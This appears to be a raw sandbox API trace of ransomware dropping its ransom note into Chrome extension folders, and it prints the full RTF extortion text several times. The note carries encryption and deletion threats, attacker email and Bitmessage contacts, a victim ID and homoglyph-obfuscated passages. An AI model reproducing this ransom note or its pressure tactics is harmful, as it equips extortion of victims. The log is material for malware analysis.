s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.319] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.320] CloseHandle (hObject=0x2e8) returned 1 [0289.320] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0289.320] GetLastError () returned 0x2 [0289.320] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.321] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.321] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 